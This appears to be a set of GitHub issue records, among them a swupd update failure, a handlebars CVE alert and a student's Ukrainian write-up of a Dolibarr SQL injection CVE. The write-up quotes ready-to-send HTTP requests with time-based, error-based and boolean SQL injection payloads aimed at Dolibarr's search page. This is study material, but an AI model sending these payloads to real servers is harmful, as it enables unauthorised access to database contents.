Error for /var/lib/swupd/pack-package-builder-from-0-to-25550.tar download: Response 206 - Timeout was reached
Error for /var/lib/swupd/pack-x11-server-from-0-to-25550.tar download: Response 206 - Timeout was reached
Statistics for going from version 24710 to version 25550:
changed bundles : 66
new bundles : 5
deleted bundles : 0
changed files : 297291
new files : 27712
deleted files : 40718
Starting download of remaining update content. This may take a while...
...0%Error for /var/lib/swupd/download/.85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar download: Response 0 - Couldn't connect to server
...100%
Finishing download of update content...
Starting download retry #1 for https://cdn.download.clearlinux.org/update//25440/files/85f02a25adeec74f39d6ad7375e9833a687bf7ed5c7e6f4486a597e137035faf.tar
Staging file content
Applying update
...100%
Update was applied.
Calling post-update helper scripts.
none
rngd.service: needs a restart (a library dependency was updated)
clr_debug_fuse.service: needs a restart (a library dependency was updated)
pacdiscovery.service: needs a restart (the binary was updated)
tallow.service: needs a restart (the binary was updated)
systemd-udevd.service: needs a restart (the binary was updated)
pacrunner.service: needs a restart (the binary was updated)
systemd-journald.service: needs a restart (the binary was updated)
clr_debug_daemon.service: needs a restart (a library dependency was updated)
httpd.service: needs a restart (the binary was updated)
mcelog.service: needs a restart (the binary was updated)
systemd-resolved.service: needs a restart (the binary was updated)
systemd-timesyncd.service: needs a restart (the binary was updated)
Update took 1799.1 seconds
37706 files were not in a pack
Update successful. System updated from version 24710 to version 25550
```
Due to many service updates, I rebooted after the update:
```
* A kernel update is available: you may wish to reboot the system.
* Some system services need a restart.
Run `sudo clr-service-restart -a -n` to view them.
WARNING: No system proxies configured.
See /home/mhorn/.README.txt for setup information.
$ sudo clr-service-restart -a -n
systemd-networkd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-networkd.service
docker.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart docker.service
polkit.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart polkit.service
bluetooth.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart bluetooth.service
accounts-daemon.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart accounts-daemon.service
wpa_supplicant.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart wpa_supplicant.service
ModemManager.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart ModemManager.service
fwupd.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart fwupd.service
colord.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart colord.service
gdm.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart gdm.service
upower.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart upower.service
dbus.service: needs a restart (a library dependency was updated)
/usr/bin/systemctl --no-ask-password try-restart dbus.service
systemd-logind.service: needs a restart (the binary was updated)
/usr/bin/systemctl --no-ask-password try-restart systemd-logind.service
```
After the reboot I attempt to enable autoupdate:
```
$ sudo swupd autoupdate
Disabled
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Removed /etc/systemd/system/swupd-update.service.
Removed /etc/systemd/system/swupd-update.timer.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Tried a second time:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Attempted a Verify:
```
$ sudo swupd verify
Verifying version 25550
Verifying files
...100%
Inspected 320900 files
Verify successful
```
Verify is clean, tried again:
```
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
$ sudo swupd autoupdate
Failed to get unit file state for swupd-update.service: No such file or directory
Disabled
```
Okay, Verify Fix:
```
$ sudo swupd verify --fix
Verifying version 25550
Verifying files
...100%
Starting download of remaining update content. This may take a while...
...100%
Finishing download of update content...
Adding any missing files
Fixing modified files
...100%
Inspected 320900 files
0 files were missing
0 files found which should be deleted
Calling post-update helper scripts.
none
Fix successful
$ sudo swupd autoupdate --enable
Running systemctl to enable updates
Unit swupd-update.service does not exist, proceeding anyway.
Unit swupd-update.timer does not exist, proceeding anyway.
Failed to start swupd-update.timer: Unit swupd-update.timer not found.
```
Still not able to enable auto-update.
Next steps?
|
non_defect
|
swupd autoupdate broken can not enable my system had autoupdate disabled and had fallen behind quite a bit sudo swupd info installed version version url content url so i manually update to the latest release sudo swupd update update started preparing to update from to downloading packs extracting zstd pack for version error for var lib swupd pack package builder from to tar download response failure when receiving data from the peer error for var lib swupd pack server from to tar download response failure when receiving data from the peer starting download retry for starting download retry for error for var lib swupd pack server from to tar download response no error error for var lib swupd pack package builder from to tar download response no error starting download retry for starting download retry for error for var lib swupd pack server from to tar download response no error error for var lib swupd pack package builder from to tar download response no error starting download retry for starting download retry for error for var lib swupd pack server from to tar download response no error error for var lib swupd pack package builder from to tar download response no error starting download retry for starting download retry for error for var lib swupd pack server from to tar download response no error error for var lib swupd pack package builder from to tar download response no error starting download retry for starting download retry for error for var lib swupd pack package builder from to tar download response timeout was reached error for var lib swupd pack server from to tar download response timeout was reached statistics for going from version to version changed bundles new bundles deleted bundles changed files new files deleted files starting download of remaining update content this may take a while error for var lib swupd download tar download response couldn t connect to server finishing download of update content starting download retry for staging file content applying update update was applied calling post update helper scripts none rngd service needs a restart a library dependency was updated clr debug fuse service needs a restart a library dependency was updated pacdiscovery service needs a restart the binary was updated tallow service needs a restart the binary was updated systemd udevd service needs a restart the binary was updated pacrunner service needs a restart the binary was updated systemd journald service needs a restart the binary was updated clr debug daemon service needs a restart a library dependency was updated httpd service needs a restart the binary was updated mcelog service needs a restart the binary was updated systemd resolved service needs a restart the binary was updated systemd timesyncd service needs a restart the binary was updated update took seconds files were not in a pack update successful system updated from version to version due to many service updates i rebooted after the update a kernel update is available you may wish to reboot the system some system services need a restart run sudo clr service restart a n to view them warning no system proxies configured see home mhorn readme txt for setup information sudo clr service restart a n systemd networkd service needs a restart the binary was updated usr bin systemctl no ask password try restart systemd networkd service docker service needs a restart the binary was updated usr bin systemctl no ask password try restart docker service polkit service needs a restart a library dependency was updated usr bin systemctl no ask password try restart polkit service bluetooth service needs a restart a library dependency was updated usr bin systemctl no ask password try restart bluetooth service accounts daemon service needs a restart the binary was updated usr bin systemctl no ask password try restart accounts daemon service wpa supplicant service needs a restart a library dependency was updated usr bin systemctl no ask password try restart wpa supplicant service modemmanager service needs a restart the binary was updated usr bin systemctl no ask password try restart modemmanager service fwupd service needs a restart the binary was updated usr bin systemctl no ask password try restart fwupd service colord service needs a restart a library dependency was updated usr bin systemctl no ask password try restart colord service gdm service needs a restart the binary was updated usr bin systemctl no ask password try restart gdm service upower service needs a restart a library dependency was updated usr bin systemctl no ask password try restart upower service dbus service needs a restart a library dependency was updated usr bin systemctl no ask password try restart dbus service systemd logind service needs a restart the binary was updated usr bin systemctl no ask password try restart systemd logind service after the reboot i attempt to enable autoupdate sudo swupd autoupdate disabled sudo swupd autoupdate enable running systemctl to enable updates removed etc systemd system swupd update service removed etc systemd system swupd update timer failed to start swupd update timer unit swupd update timer not found tried a second time sudo swupd autoupdate enable running systemctl to enable updates unit swupd update service does not exist proceeding anyway unit swupd update timer does not exist proceeding anyway failed to start swupd update timer unit swupd update timer not found sudo swupd autoupdate failed to get unit file state for swupd update service no such file or directory disabled attempted a verify sudo swupd verify verifying version verifying files inspected files verify successful verify is clean tried again sudo swupd autoupdate enable running systemctl to enable updates unit swupd update service does not exist proceeding anyway unit swupd update timer does not exist proceeding anyway failed to start swupd update timer unit swupd update timer not found sudo swupd autoupdate failed to get unit file state for swupd update service no such file or directory disabled okay verify fix sudo swupd verify fix verifying version verifying files starting download of remaining update content this may take a while finishing download of update content adding any missing files fixing modified files inspected files files were missing files found which should be deleted calling post update helper scripts none fix successful sudo swupd autoupdate enable running systemctl to enable updates unit swupd update service does not exist proceeding anyway unit swupd update timer does not exist proceeding anyway failed to start swupd update timer unit swupd update timer not found still not able to enable auto update next steps
| 0
|
101,929
| 12,730,669,532
|
IssuesEvent
|
2020-06-25 07:53:26
|
BlueBrain/nexus
|
https://api.github.com/repos/BlueBrain/nexus
|
opened
|
Studio Migration
|
project-fusion 🦄 design 🦊 team:frontend
|
Options
- Port entire functionality as a "Studio Widget"
- Each studio becomes project, each workspace becomes an activity, each dashboard becomes its own widget
- Studio becomes an activity, with a workspace and dashboard as nested activities
- Keep it insides Admin "subapp"
|
1.0
|
Studio Migration - Options
- Port entire functionality as a "Studio Widget"
- Each studio becomes project, each workspace becomes an activity, each dashboard becomes its own widget
- Studio becomes an activity, with a workspace and dashboard as nested activities
- Keep it insides Admin "subapp"
|
non_defect
|
studio migration options port entire functionality as a studio widget each studio becomes project each workspace becomes an activity each dashboard becomes its own widget studio becomes an activity with a workspace and dashboard as nested activities keep it insides admin subapp
| 0
|
77,773
| 3,507,255,764
|
IssuesEvent
|
2016-01-08 12:12:29
|
OregonCore/OregonCore
|
https://api.github.com/repos/OregonCore/OregonCore
|
closed
|
loot sunwell (BB #752)
|
migrated Priority: Medium Type: Bug
|
This issue was migrated from bitbucket.
**Original Reporter:** alex63168
**Original Date:** 03.12.2014 20:04:50 GMT+0000
**Original Priority:** major
**Original Type:** bug
**Original State:** resolved
**Direct Link:** https://bitbucket.org/oregon/oregoncore/issues/752
<hr>
in sanvele not work loot drops only 2 clothes
|
1.0
|
loot sunwell (BB #752) - This issue was migrated from bitbucket.
**Original Reporter:** alex63168
**Original Date:** 03.12.2014 20:04:50 GMT+0000
**Original Priority:** major
**Original Type:** bug
**Original State:** resolved
**Direct Link:** https://bitbucket.org/oregon/oregoncore/issues/752
<hr>
in sanvele not work loot drops only 2 clothes
|
non_defect
|
loot sunwell bb this issue was migrated from bitbucket original reporter original date gmt original priority major original type bug original state resolved direct link in sanvele not work loot drops only clothes
| 0
|
100,792
| 16,490,416,873
|
IssuesEvent
|
2021-05-25 02:19:07
|
hiucimon/PF2Client
|
https://api.github.com/repos/hiucimon/PF2Client
|
opened
|
CVE-2021-23383 (High) detected in handlebars-4.0.11.tgz
|
security vulnerability
|
## CVE-2021-23383 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /PF2Client/package.json</p>
<p>Path to vulnerable library: PF2Client/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- build-angular-0.6.8.tgz (Root Library)
- istanbul-0.4.5.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.
<p>Publish Date: 2021-05-04
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-23383>CVE-2021-23383</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383</a></p>
<p>Release Date: 2021-05-04</p>
<p>Fix Resolution: handlebars - v4.7.7</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
True
|
CVE-2021-23383 (High) detected in handlebars-4.0.11.tgz - ## CVE-2021-23383 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>handlebars-4.0.11.tgz</b></p></summary>
<p>Handlebars provides the power necessary to let you build semantic templates effectively with no frustration</p>
<p>Library home page: <a href="https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz">https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz</a></p>
<p>Path to dependency file: /PF2Client/package.json</p>
<p>Path to vulnerable library: PF2Client/node_modules/handlebars/package.json</p>
<p>
Dependency Hierarchy:
- build-angular-0.6.8.tgz (Root Library)
- istanbul-0.4.5.tgz
- :x: **handlebars-4.0.11.tgz** (Vulnerable Library)
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.
<p>Publish Date: 2021-05-04
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-23383>CVE-2021-23383</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23383</a></p>
<p>Release Date: 2021-05-04</p>
<p>Fix Resolution: handlebars - v4.7.7</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
|
non_defect
|
cve high detected in handlebars tgz cve high severity vulnerability vulnerable library handlebars tgz handlebars provides the power necessary to let you build semantic templates effectively with no frustration library home page a href path to dependency file package json path to vulnerable library node modules handlebars package json dependency hierarchy build angular tgz root library istanbul tgz x handlebars tgz vulnerable library vulnerability details the package handlebars before are vulnerable to prototype pollution when selecting certain compiling options to compile templates coming from an untrusted source publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution handlebars step up your open source security game with whitesource
| 0
|
53,360
| 11,043,596,980
|
IssuesEvent
|
2019-12-09 11:31:41
|
ballerina-platform/ballerina-lang
|
https://api.github.com/repos/ballerina-platform/ballerina-lang
|
opened
|
Tooling not working with field/index/invocation access on grouped varRef
|
Area/Tooling Component/VScodePlugin Priority/High
|
**Description:**
https://github.com/ballerina-platform/ballerina-lang/pull/20234 enabled field/index/invocation access on grouped `varRefs`. However, it's not reflected in tooling (VS code plugin).
**Steps to reproduce:**
```ballerina
public type Person record {
int age;
string name;
};
public function main() {
Person p = {
age: 0,
name: ""
};
// typing `p.` and ctrl + space suggests `age`, `name`.
// typing `(p).` and ctrl + space should suggests `age`, `name` as well,
// but it's not getting suggested.
}
```
**Affected Versions:**
1.1.0-alpha
**OS, DB, other environment details and versions:**
Mac / VS code plugin.
**Related Issues (optional):**
-
|
1.0
|
Tooling not working with field/index/invocation access on grouped varRef - **Description:**
https://github.com/ballerina-platform/ballerina-lang/pull/20234 enabled field/index/invocation access on grouped `varRefs`. However, it's not reflected in tooling (VS code plugin).
**Steps to reproduce:**
```ballerina
public type Person record {
int age;
string name;
};
public function main() {
Person p = {
age: 0,
name: ""
};
// typing `p.` and ctrl + space suggests `age`, `name`.
// typing `(p).` and ctrl + space should suggests `age`, `name` as well,
// but it's not getting suggested.
}
```
**Affected Versions:**
1.1.0-alpha
**OS, DB, other environment details and versions:**
Mac / VS code plugin.
**Related Issues (optional):**
-
|
non_defect
|
tooling not working with field index invocation access on grouped varref description enabled field index invocation access on grouped varrefs however it s not reflected in tooling vs code plugin steps to reproduce ballerina public type person record int age string name public function main person p age name typing p and ctrl space suggests age name typing p and ctrl space should suggests age name as well but it s not getting suggested affected versions alpha os db other environment details and versions mac vs code plugin related issues optional
| 0
|
372,753
| 26,018,106,908
|
IssuesEvent
|
2022-12-21 10:13:24
|
oleksandrblazhko/ai181-zalukovskij
|
https://api.github.com/repos/oleksandrblazhko/ai181-zalukovskij
|
closed
|
CW7
|
documentation
|
# Запитання №1
### Запитання
Опишіть ПЗ, в якому знайдено вразливість:
- назва ПЗ, URL-посилання в інтернеті (знайти через пошукову систему);
- призначення ПЗ та приклади споживачів, які можуть бути зацікавлені у використанні ПЗ;
### Відповідь
- Dolibarr, https://www.dolibarr.org/;
- Dolibarr ERP & CRM — це сучасний програмний пакет, який допомагає керувати діяльністю вашої організації (контакти, постачальники, рахунки-фактури, замовлення, запаси, порядок денний…). Це пакет програмного забезпечення з відкритим кодом, призначений для малих, середніх і великих компаній, фондів і фрілансерів.
# Запитання №2
### Запитання
Опишіть знайдену вразливість, переклавшу на українську розділ Description.
### Відповідь
Атаки SQL-ін’єкції можуть призвести до несанкціонованого доступу до конфіденційних даних, таких як паролі, дані кредитної картки або особиста інформація користувача. Багато резонансних витоків даних за останні роки були результатом атак SQL-ін’єкцій, що призвело до шкоди репутації та регуляторних штрафів. У деяких випадках зловмисник може отримати постійний бекдор до систем організації, що призведе до довгострокового злому, який може залишатися непоміченим протягом тривалого періоду. Це вражає лише 16.0.1 та 16.0.2. 16.0.0 або нижче та 16.0.3 або вище не уражені.
# Запитання №3
### Запитання
Наведіть фрагменти прикладів уразливого програмного коду, розглянувши розділ References to Advisories, Solutions, and Tools.
### Відповідь
Часова сліпа SQL ін'єкція
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
SQL ін'єкція на основі аналізу помилок
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Логічна сліпа SQL ін'єкція
GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
# Запитання №4 (3 бали)
### Запитання
В таблиці 2 наведено URL-посилання на наукові публікації, пов’язані з SQL-injection.
Розглянувши приклад публікації, номер якої співпадає з номером вашого варіанту виконання лабораторних робіт, перекладіть української вказані назви розділи.
### Відповідь
#### 8 Поради щодо профілактики
Щоб уникнути атак, описаних у цьому документі, запобігання недолікам SQLi має мати найвищий пріоритет. Найбезпечнішим запобіжним заходом вважається використання готових заяв [18]. Підготовлені оператори гарантують, що зловмисники не зможуть змінити мету запиту, навіть якщо вставляються інші команди SQL [19].
Різноманітні механізми очищення, такі як magic_quotes() і addslashes(), не можуть повністю запобігти наявності або використанню вразливості SQLi, оскільки певні методи, які використовуються в поєднанні з умовами середовища, можуть дозволити зловмисникам використовувати вразливість [20][21]. Натомість, якщо підготовлені оператори не використовуються, рекомендується використовувати перевірку введення з відхиленням неправильного введення, а не екрануванням або зміною [22].
Адміністратор повинен завжди бути готовим до несанкціонованого доступу до основної бази даних. Хорошим контрзаходом є обмеження доступу до бази даних до найменших привілеїв. Таким чином, будь-який наданий привілей повинен бути наданий найменшій кількості коду, необхідного для найкоротшого періоду часу, необхідного для виконання роботи [23]. Дотримуючись цього принципу, користувачі повинні мати доступ лише до тієї інформації та ресурсів, які є абсолютно необхідними.
В якості останнього кроку, для успішного пом’якшення можливих атак екстракції DNS, адміністратор повинен переконатися, що виконання всіх непотрібних системних підпрограм обмежено. Якщо все не вдається, зловмисники не повинні мати змоги запустити ті, які можуть спровокувати запити DNS.
Була проведена певна робота в області виявлення шкідливих дій у DNS-трафіку [25][26], але здебільшого через відсутність практичних і основних рішень, вони не будуть спеціально згадуватися тут.
#### 9 Висновок
У цьому документі було показано, як зловмисники можуть використовувати техніку ексфільтрації DNS, щоб значно прискорити пошук даних, коли можна використовувати лише відносно повільні методи SQLi. Крім того, різко зменшено кількість необхідних запитів до вразливого веб-сервера, що робить його менш шумним.
Через вимогу контролю над сервером доменних імен він, ймовірно, не буде використовуватися більшістю зловмисників. З точки зору впровадження все було просто, тому не можна ігнорувати його практичну цінність. Реалізована підтримка всередині sqlmap повинна зробити його загальнодоступним для всіх для подальших досліджень.
|
1.0
|
CW7 - # Запитання №1
### Запитання
Опишіть ПЗ, в якому знайдено вразливість:
- назва ПЗ, URL-посилання в інтернеті (знайти через пошукову систему);
- призначення ПЗ та приклади споживачів, які можуть бути зацікавлені у використанні ПЗ;
### Відповідь
- Dolibarr, https://www.dolibarr.org/;
- Dolibarr ERP & CRM — це сучасний програмний пакет, який допомагає керувати діяльністю вашої організації (контакти, постачальники, рахунки-фактури, замовлення, запаси, порядок денний…). Це пакет програмного забезпечення з відкритим кодом, призначений для малих, середніх і великих компаній, фондів і фрілансерів.
# Запитання №2
### Запитання
Опишіть знайдену вразливість, переклавшу на українську розділ Description.
### Відповідь
Атаки SQL-ін’єкції можуть призвести до несанкціонованого доступу до конфіденційних даних, таких як паролі, дані кредитної картки або особиста інформація користувача. Багато резонансних витоків даних за останні роки були результатом атак SQL-ін’єкцій, що призвело до шкоди репутації та регуляторних штрафів. У деяких випадках зловмисник може отримати постійний бекдор до систем організації, що призведе до довгострокового злому, який може залишатися непоміченим протягом тривалого періоду. Це вражає лише 16.0.1 та 16.0.2. 16.0.0 або нижче та 16.0.3 або вище не уражені.
# Запитання №3
### Запитання
Наведіть фрагменти прикладів уразливого програмного коду, розглянувши розділ References to Advisories, Solutions, and Tools.
### Відповідь
Часова сліпа SQL ін'єкція
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
SQL ін'єкція на основі аналізу помилок
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Логічна сліпа SQL ін'єкція
GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
# Запитання №4 (3 бали)
### Запитання
В таблиці 2 наведено URL-посилання на наукові публікації, пов’язані з SQL-injection.
Розглянувши приклад публікації, номер якої співпадає з номером вашого варіанту виконання лабораторних робіт, перекладіть української вказані назви розділи.
### Відповідь
#### 8 Поради щодо профілактики
Щоб уникнути атак, описаних у цьому документі, запобігання недолікам SQLi має мати найвищий пріоритет. Найбезпечнішим запобіжним заходом вважається використання готових заяв [18]. Підготовлені оператори гарантують, що зловмисники не зможуть змінити мету запиту, навіть якщо вставляються інші команди SQL [19].
Різноманітні механізми очищення, такі як magic_quotes() і addslashes(), не можуть повністю запобігти наявності або використанню вразливості SQLi, оскільки певні методи, які використовуються в поєднанні з умовами середовища, можуть дозволити зловмисникам використовувати вразливість [20][21]. Натомість, якщо підготовлені оператори не використовуються, рекомендується використовувати перевірку введення з відхиленням неправильного введення, а не екрануванням або зміною [22].
Адміністратор повинен завжди бути готовим до несанкціонованого доступу до основної бази даних. Хорошим контрзаходом є обмеження доступу до бази даних до найменших привілеїв. Таким чином, будь-який наданий привілей повинен бути наданий найменшій кількості коду, необхідного для найкоротшого періоду часу, необхідного для виконання роботи [23]. Дотримуючись цього принципу, користувачі повинні мати доступ лише до тієї інформації та ресурсів, які є абсолютно необхідними.
В якості останнього кроку, для успішного пом’якшення можливих атак екстракції DNS, адміністратор повинен переконатися, що виконання всіх непотрібних системних підпрограм обмежено. Якщо все не вдається, зловмисники не повинні мати змоги запустити ті, які можуть спровокувати запити DNS.
Була проведена певна робота в області виявлення шкідливих дій у DNS-трафіку [25][26], але здебільшого через відсутність практичних і основних рішень, вони не будуть спеціально згадуватися тут.
#### 9 Висновок
У цьому документі було показано, як зловмисники можуть використовувати техніку ексфільтрації DNS, щоб значно прискорити пошук даних, коли можна використовувати лише відносно повільні методи SQLi. Крім того, різко зменшено кількість необхідних запитів до вразливого веб-сервера, що робить його менш шумним.
Через вимогу контролю над сервером доменних імен він, ймовірно, не буде використовуватися більшістю зловмисників. З точки зору впровадження все було просто, тому не можна ігнорувати його практичну цінність. Реалізована підтримка всередині sqlmap повинна зробити його загальнодоступним для всіх для подальших досліджень.
|
non_defect
|
